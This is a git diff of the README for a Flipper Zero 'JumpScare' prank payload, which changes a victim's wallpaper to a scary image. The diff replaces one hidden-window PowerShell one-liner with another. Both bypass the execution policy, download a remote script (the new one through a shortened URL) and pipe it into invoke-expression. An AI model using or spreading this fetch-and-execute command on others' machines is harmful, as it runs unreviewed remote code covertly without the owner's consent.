diff --git a/Payloads/Flip-JumpScare/README.md b/Payloads/Flip-JumpScare/README.md index 61e14a7..3b2209d 100644 --- a/Payloads/Flip-JumpScare/README.md +++ b/Payloads/Flip-JumpScare/README.md @@ -37,7 +37,7 @@ At that point there desktop wallpaper will be changed to the scary image provide * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-JumpScare/JumpScare.ps1?dl=1; invoke-expression $pl +powershell -w h -NoP -NonI -Exec Bypass iwr jakoby.lol/0tn | iex ```